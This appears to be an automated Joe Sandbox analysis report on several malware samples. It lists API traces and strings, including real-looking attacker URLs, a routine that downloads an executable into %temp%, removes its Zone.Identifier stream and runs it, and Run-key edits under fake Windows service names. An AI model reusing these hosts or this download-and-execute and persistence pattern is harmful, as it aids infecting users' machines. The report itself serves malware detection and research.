EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSectionmemcpy$EnterLeave
String ID:
API String ID: 469056452-0
Opcode ID: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
Opcode Fuzzy Hash: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A

Analysis Process: 158238779.exePID: 2408, Parent PID: 7612COMMON

Execution Graph

Execution Coverage:	18.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	13
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FFAAC1A0685 Relevance: 1.6, APIs: 1, Instructions: 128
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00007FFAAC1A0FD1

Memory Dump Source

Source File: 00000014.00000002.1728784209.00007FFAAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffaac1a0000_158238779.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: ae85c727daecbac94b76ed7c973849a84457ae9fc8fd633b7591f8c7088e1ced
Instruction ID: 520e07494611c0a86847d92bee5bdf4222ba8aedaba8c655ebefedf654db154c
Opcode Fuzzy Hash: ae85c727daecbac94b76ed7c973849a84457ae9fc8fd633b7591f8c7088e1ced
Instruction Fuzzy Hash: D631F471A0CA4C8FE718DB9CE849AF9BBE1EF95315F10423FD04AD3252DB7068468781

Function 00007FFAAC1A0F11 Relevance: 1.6, APIs: 1, Instructions: 126
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00007FFAAC1A0FD1

Memory Dump Source

Source File: 00000014.00000002.1728784209.00007FFAAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffaac1a0000_158238779.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 0612fe2bb8dfe8425f5232d1c32b68718e015c147886c80f4befc91b12e0e6b0
Instruction ID: 683d99ef8246cb5c9afd51a269b923d40ba3dce995d392a10df8e38edf8e8c9c
Opcode Fuzzy Hash: 0612fe2bb8dfe8425f5232d1c32b68718e015c147886c80f4befc91b12e0e6b0
Instruction Fuzzy Hash: 9F31E47090CB488FDB18DF98D845AF9BBE1EF5A721F00426FD04AD3652DB606856CB81

Function 00007FFAAC1A0690 Relevance: 1.6, APIs: 1, Instructions: 118
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00007FFAAC1A0FD1

Memory Dump Source

Source File: 00000014.00000002.1728784209.00007FFAAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffaac1a0000_158238779.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 29b62f1e535c3ec2cb368187e366104e858fb28e307be74528047afc16d20eb1
Instruction ID: b355deba8e996eb1c772e0179683a9c0a70ba715a7935d6ffaee533486877850
Opcode Fuzzy Hash: 29b62f1e535c3ec2cb368187e366104e858fb28e307be74528047afc16d20eb1
Instruction Fuzzy Hash: 9E31D47190CA4C8FDB18DB98E845AF9BBE5EB59315F10423FD00AD3252DF7068568781

Analysis Process: 281653412.exePID: 1920, Parent PID: 7612COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00E810A0 Relevance: 36.8, APIs: 8, Strings: 13, Instructions: 78
registrysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00E810AB

Part of subcall function 00E81000: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00E8101A
Part of subcall function 00E81000: wsprintfW.USER32 ref: 00E81033
Part of subcall function 00E81000: PathFileExistsW.KERNELBASE(?), ref: 00E81043

RegOpenKeyExW.KERNELBASE(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,?), ref: 00E81123
RegDeleteValueW.KERNELBASE(?,Microsoft Windows Service), ref: 00E81151
RegCloseKey.KERNELBASE(?), ref: 00E8115D
Sleep.KERNELBASE(000007D0), ref: 00E81168
RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,?), ref: 00E81183
RegDeleteValueW.KERNELBASE(?,Microsoft Windows Service), ref: 00E811B1
RegCloseKey.KERNELBASE(?), ref: 00E811BD

Strings

Windows Upgrade 40885040, xrefs: 00E810E9
$, xrefs: 00E810F0
(#, xrefs: 00E810B8
Windows Operating System, xrefs: 00E810F7
Microsoft Windows Driver, xrefs: 00E810C6
L$, xrefs: 00E810DB
Microsoft Windows Service, xrefs: 00E810B1, 00E8114C, 00E811AC
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00E81179
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00E81119
Windows Update 75849348, xrefs: 00E810D4
Windows Update 4950505060, xrefs: 00E810E2
`#, xrefs: 00E810BF
Host Process for Windows Services, xrefs: 00E810CD

Memory Dump Source

Source File: 0000001B.00000002.1811896416.0000000000E81000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E80000, based on PE: true

Associated: 0000001B.00000002.1811878599.0000000000E80000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.1811913395.0000000000E82000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.1811930487.0000000000E83000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.1811949340.0000000000E84000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.1811970876.0000000000E85000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_e80000_281653412.jbxd

Similarity

API ID: CloseDeleteOpenSleepValue$EnvironmentExistsExpandFilePathStringswsprintf
String ID: (#$Host Process for Windows Services$L$$Microsoft Windows Driver$Microsoft Windows Service$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Operating System$Windows Update 4950505060$Windows Update 75849348$Windows Upgrade 40885040$`#$$
API String ID: 2575504554-3388493446
Opcode ID: 82d397fda19a648987a2697279c61351bd81a3f0cd066b002eaa51253b8f7f8d
Instruction ID: 6705837aef227c9f8fd07b0359b4141d0a402d8633d019725f8a9d7d583bc037
Opcode Fuzzy Hash: 82d397fda19a648987a2697279c61351bd81a3f0cd066b002eaa51253b8f7f8d
Instruction Fuzzy Hash: 5A312570912219AFDB04EFD0ED89BADBBBABB44305F20604CF70DBA240C3B45549DB65

Function 00E81000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00E8101A
wsprintfW.USER32 ref: 00E81033
PathFileExistsW.KERNELBASE(?), ref: 00E81043
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00E81069
CloseHandle.KERNELBASE(000000FF), ref: 00E81085

Strings

%temp%, xrefs: 00E81015
%s\dd55ddff6fd.txt, xrefs: 00E81027

Memory Dump Source

Source File: 0000001B.00000002.1811896416.0000000000E81000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00E80000, based on PE: true

Associated: 0000001B.00000002.1811878599.0000000000E80000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.1811913395.0000000000E82000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.1811930487.0000000000E83000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.1811949340.0000000000E84000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.1811970876.0000000000E85000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_e80000_281653412.jbxd

Similarity

API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
String ID: %s\dd55ddff6fd.txt$%temp%
API String ID: 750032643-2034341319
Opcode ID: 0b3050d23ec0938a9a8fe7b98d8807bfb5f30641dc63e1adfcefa44481c639b7
Instruction ID: 08a8ceba9596dc52e7fd9d50f94afb1e6611253ae75add3a759bb1bbf37e5acd
Opcode Fuzzy Hash: 0b3050d23ec0938a9a8fe7b98d8807bfb5f30641dc63e1adfcefa44481c639b7
Instruction Fuzzy Hash: 200121B4940318AFD720AB609C4AFE5737CAB44704F0086D8A71DB60E1DAB05AC9CBA5

Analysis Process: 1332331323.exePID: 1316, Parent PID: 7612COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 009510B0 Relevance: 59.7, APIs: 28, Strings: 6, Instructions: 183
filenetworksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 009510B9
srand.MSVCR90 ref: 009510C0
DeleteUrlCacheEntryW.WININET(?), ref: 009510CC
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009510EA
rand.MSVCR90 ref: 009510F0
rand.MSVCR90 ref: 00951104
wsprintfW.USER32 ref: 0095112B
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00951141
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0095116D
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0095119C
InternetReadFile.WININET(00000000,?,00000103,?), ref: 009511CF
WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 00951200
CloseHandle.KERNEL32(000000FF), ref: 0095120F
wsprintfW.USER32 ref: 00951228
DeleteFileW.KERNELBASE(?), ref: 00951238
CloseHandle.KERNEL32(000000FF), ref: 00951263
InternetCloseHandle.WININET(00000000), ref: 00951270
InternetCloseHandle.WININET(00000000), ref: 0095127D
Sleep.KERNELBASE(000001F4), ref: 00951288
rand.MSVCR90 ref: 0095129D
Sleep.KERNEL32 ref: 009512B4
rand.MSVCR90 ref: 009512BA
rand.MSVCR90 ref: 009512CE
wsprintfW.USER32 ref: 009512F5
DeleteUrlCacheEntryW.WININET(?), ref: 00951302
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00951319
wsprintfW.USER32 ref: 00951335
DeleteFileW.KERNEL32(?), ref: 00951345

Strings

%s\%d%d.exe, xrefs: 009512E9
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 0095113C
%s:Zone.Identifier, xrefs: 0095121C
%s\%d%d.exe, xrefs: 0095111F
%temp%, xrefs: 009510E5
%s:Zone.Identifier, xrefs: 00951329

Memory Dump Source

Source File: 0000001D.00000002.1981775121.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000001D.00000002.1981757110.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001D.00000002.1981792308.0000000000952000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001D.00000002.1981812527.0000000000954000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_950000_1332331323.jbxd

Similarity

API ID: File$Internetrand$CloseDeleteHandlewsprintf$CacheEntryOpenSleep$CountCreateDownloadEnvironmentExpandReadStringsTickWritesrand
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
API String ID: 3548267932-1161929716
Opcode ID: f44a70a534cd6ed365f485c30771d4c441b2b49d90773d63fe6e89731f13466f
Instruction ID: 787dc60daed9f61f6fc68be5b390873b1aca27b3211d1327ed66222dd2f5cd9b
Opcode Fuzzy Hash: f44a70a534cd6ed365f485c30771d4c441b2b49d90773d63fe6e89731f13466f
Instruction Fuzzy Hash: 1F61D5B5955318ABD724DB61DC4AFEA337DAB89703F004488FA0D960D0DB746B84CFA0

Function 00951000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCR90 ref: 0095100E
memset.MSVCR90 ref: 0095101E
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00951057
Sleep.KERNELBASE(000003E8), ref: 00951067
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00951082
Sleep.KERNEL32(000003E8), ref: 0095109C

Strings

D, xrefs: 00951026
open, xrefs: 0095107B
, xrefs: 00951091

Memory Dump Source

Source File: 0000001D.00000002.1981775121.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000001D.00000002.1981757110.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001D.00000002.1981792308.0000000000952000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001D.00000002.1981812527.0000000000954000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_950000_1332331323.jbxd

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 3787208655-2182757814
Opcode ID: f2ebf5ba6f82cac0a72272577fc5352d8b108ccfcbd897b4b507529af66f9617
Instruction ID: 3893392d0f9e2f689e9bb08e10be409a983c2a310ed7002357594d0342a23c6a
Opcode Fuzzy Hash: f2ebf5ba6f82cac0a72272577fc5352d8b108ccfcbd897b4b507529af66f9617
Instruction Fuzzy Hash: D2117371E84308BBEB10DFA1CC46FEE7778AB55B02F200115FB096E2C0D6B59A48DB65

Function 009513C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009513DA
wsprintfW.USER32 ref: 009513F3
PathFileExistsW.KERNELBASE(?), ref: 00951403
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00951429
CloseHandle.KERNELBASE(000000FF), ref: 00951445

Strings

%temp%, xrefs: 009513D5
%s\roapalr.jpg, xrefs: 009513E7

Memory Dump Source

Source File: 0000001D.00000002.1981775121.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000001D.00000002.1981757110.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001D.00000002.1981792308.0000000000952000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001D.00000002.1981812527.0000000000954000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_950000_1332331323.jbxd

Similarity

API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
String ID: %s\roapalr.jpg$%temp%
API String ID: 750032643-1357684243
Opcode ID: bc625a61bc887a91f72e1a6cd109ca801e373830330985d5d9373e4159c53e1c
Instruction ID: 33ea7ca4c34457de26c78e2ee35fbb7ab70f9008a2d2235bd04492ec03f43f95
Opcode Fuzzy Hash: bc625a61bc887a91f72e1a6cd109ca801e373830330985d5d9373e4159c53e1c
Instruction Fuzzy Hash: 1D0184B4950308ABD720DB619C4AFE67338AB45706F004594AA19A60E1D6B05AC9DFA5

Function 00951360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 0095137A
wsprintfW.USER32 ref: 00951393
PathFileExistsW.KERNELBASE(?), ref: 009513A3

Strings

%systemdrive%, xrefs: 00951375
%s\Program Files (x86), xrefs: 00951387

Memory Dump Source

Source File: 0000001D.00000002.1981775121.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000001D.00000002.1981757110.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001D.00000002.1981792308.0000000000952000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001D.00000002.1981812527.0000000000954000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_950000_1332331323.jbxd

Similarity

API ID: EnvironmentExistsExpandFilePathStringswsprintf
String ID: %s\Program Files (x86)$%systemdrive%
API String ID: 3337111443-1963301939
Opcode ID: d507f8abf78f6cd88ec6322716f2993384e882b98fb77d36060faf411f20f213
Instruction ID: abf6af306ca80bf1faf5c2c07ffaa9fafe879a75f433d919db2b0f8a5252a759
Opcode Fuzzy Hash: d507f8abf78f6cd88ec6322716f2993384e882b98fb77d36060faf411f20f213
Instruction Fuzzy Hash: 0FE065B550431C6BCB10DB62EC49FE6732CA702706F004694AE1992191EAB056DCEBA5

Function 00951460 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 18
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00951468

Part of subcall function 00951360: ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 0095137A
Part of subcall function 00951360: wsprintfW.USER32 ref: 00951393
Part of subcall function 00951360: PathFileExistsW.KERNELBASE(?), ref: 009513A3

Part of subcall function 009513C0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009513DA
Part of subcall function 009513C0: wsprintfW.USER32 ref: 009513F3
Part of subcall function 009513C0: PathFileExistsW.KERNELBASE(?), ref: 00951403

Part of subcall function 009510B0: GetTickCount.KERNEL32 ref: 009510B9
Part of subcall function 009510B0: srand.MSVCR90 ref: 009510C0
Part of subcall function 009510B0: DeleteUrlCacheEntryW.WININET(?), ref: 009510CC
Part of subcall function 009510B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009510EA
Part of subcall function 009510B0: rand.MSVCR90 ref: 009510F0
Part of subcall function 009510B0: rand.MSVCR90 ref: 00951104
Part of subcall function 009510B0: wsprintfW.USER32 ref: 0095112B
Part of subcall function 009510B0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00951141
Part of subcall function 009510B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0095116D
Part of subcall function 009510B0: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0095119C
Part of subcall function 009510B0: InternetReadFile.WININET(00000000,?,00000103,?), ref: 009511CF
Part of subcall function 009510B0: WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 00951200
Part of subcall function 009510B0: CloseHandle.KERNEL32(000000FF), ref: 0095120F
Part of subcall function 009510B0: wsprintfW.USER32 ref: 00951228

Strings

http://185.215.113.84/nxmr.exe, xrefs: 00951486

Memory Dump Source

Source File: 0000001D.00000002.1981775121.0000000000951000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00950000, based on PE: true

Associated: 0000001D.00000002.1981757110.0000000000950000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001D.00000002.1981792308.0000000000952000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001D.00000002.1981812527.0000000000954000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_950000_1332331323.jbxd

Similarity

API ID: File$wsprintf$EnvironmentExpandInternetStrings$ExistsOpenPathrand$CacheCloseCountCreateDeleteEntryHandleReadSleepTickWritesrand
String ID: http://185.215.113.84/nxmr.exe
API String ID: 4035879952-3066490085
Opcode ID: 7346e82ef36303d07004264d2f75dc7389d96a17ca4de4280244040c05fff19c
Instruction ID: 89aa7bfe8817dfbac359cd82477010fdd4965184d31759386648756e4058be11
Opcode Fuzzy Hash: 7346e82ef36303d07004264d2f75dc7389d96a17ca4de4280244040c05fff19c
Instruction Fuzzy Hash: F4D0A76650431521A105F3B3BC17B3F30985D41B93F401472BC46888D3ED54D40C53B2

Analysis Process: 2311326414.exePID: 2236, Parent PID: 7612COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 007A1000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 40
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfW.USER32 ref: 007A1015
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 007A102B
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 007A1056
Sleep.KERNELBASE(000003E8), ref: 007A1064
InternetCloseHandle.WININET(?), ref: 007A106E
Sleep.KERNELBASE(000003E8), ref: 007A1079
InternetCloseHandle.WININET(00000000), ref: 007A1086

Strings

http://91.202.233.141/ALLBSTATAASASD, xrefs: 007A1009
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 007A1026

Memory Dump Source

Source File: 00000020.00000002.1991171553.00000000007A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000020.00000002.1991150396.00000000007A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000020.00000002.1991188613.00000000007A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000020.00000002.1991206890.00000000007A3000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000020.00000002.1991223596.00000000007A4000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000020.00000002.1991239446.00000000007A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7a0000_2311326414.jbxd

Similarity

API ID: Internet$CloseHandleOpenSleep$wsprintf
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://91.202.233.141/ALLBSTATAASASD
API String ID: 2685051180-603325175
Opcode ID: e84d2e28f00926182771ab4147a36a16a101c3d033a010b99ae8a1c45fd1119b
Instruction ID: 0d0ae53584a9340a839788896dca059afa50635e42e637aa66ce1246ff6f4635
Opcode Fuzzy Hash: e84d2e28f00926182771ab4147a36a16a101c3d033a010b99ae8a1c45fd1119b
Instruction Fuzzy Hash: B9018474E80305ABD7259F68DC0AF6B777CEB85701F104198BB09A61D1C6781A45CF69

Function 007A1090 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 007A10AA
wsprintfW.USER32 ref: 007A10C3
PathFileExistsW.KERNELBASE(?), ref: 007A10D3
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 007A10F9
CloseHandle.KERNELBASE(000000FF), ref: 007A1115

Strings

%temp%, xrefs: 007A10A5
%s\488888888888fs.txt, xrefs: 007A10B7

Memory Dump Source

Source File: 00000020.00000002.1991171553.00000000007A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000020.00000002.1991150396.00000000007A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000020.00000002.1991188613.00000000007A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000020.00000002.1991206890.00000000007A3000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000020.00000002.1991223596.00000000007A4000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000020.00000002.1991239446.00000000007A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7a0000_2311326414.jbxd

Similarity

API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
String ID: %s\488888888888fs.txt$%temp%
API String ID: 750032643-1967234069
Opcode ID: cf0f1e20b3aab7f3c152397987e88ea42fa6c4583013a5bbfccd9334a9058177
Instruction ID: bb0d4fd611caf8d57ea9d222dd21a0256bdb35c4c0dd2d7a7f16cbf2acab44a3
Opcode Fuzzy Hash: cf0f1e20b3aab7f3c152397987e88ea42fa6c4583013a5bbfccd9334a9058177
Instruction Fuzzy Hash: 6D01A7B494031CABD7309B64DC4EFE6737CAB85700F408794A715960D2E6785AC6CFA9

Function 007A1130 Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 007A1138

Part of subcall function 007A1090: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 007A10AA
Part of subcall function 007A1090: wsprintfW.USER32 ref: 007A10C3
Part of subcall function 007A1090: PathFileExistsW.KERNELBASE(?), ref: 007A10D3

Part of subcall function 007A1000: wsprintfW.USER32 ref: 007A1015
Part of subcall function 007A1000: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 007A102B
Part of subcall function 007A1000: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 007A1056
Part of subcall function 007A1000: Sleep.KERNELBASE(000003E8), ref: 007A1064
Part of subcall function 007A1000: InternetCloseHandle.WININET(?), ref: 007A106E
Part of subcall function 007A1000: Sleep.KERNELBASE(000003E8), ref: 007A1079
Part of subcall function 007A1000: InternetCloseHandle.WININET(00000000), ref: 007A1086

Memory Dump Source

Source File: 00000020.00000002.1991171553.00000000007A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000020.00000002.1991150396.00000000007A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000020.00000002.1991188613.00000000007A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000020.00000002.1991206890.00000000007A3000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000020.00000002.1991223596.00000000007A4000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000020.00000002.1991239446.00000000007A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7a0000_2311326414.jbxd

Similarity

API ID: Internet$Sleep$CloseHandleOpenwsprintf$EnvironmentExistsExpandFilePathStrings
String ID:
API String ID: 344363592-0
Opcode ID: 199ba1984f8e2edfd99e4f04ec530911c2fc090235daf332788948a369027fb2
Instruction ID: a0efee419ba690cc9eb64ca314f621b6c6084414cde0d7e01584469f439f23a7
Opcode Fuzzy Hash: 199ba1984f8e2edfd99e4f04ec530911c2fc090235daf332788948a369027fb2
Instruction Fuzzy Hash: B7C08C3510424952B10033F6AC0F727329C4B827A2F804523B205C8083ED4DD44190B1

Analysis Process: 2448028260.exePID: 7376, Parent PID: 1316COMMON

Executed Functions

Function 00007FF6E1E514B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2118994284.00007FF6E1E51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6E1E50000, based on PE: true

Associated: 00000022.00000002.2118965797.00007FF6E1E50000.00000002.00000001.01000000.0000000F.sdmpDownload File
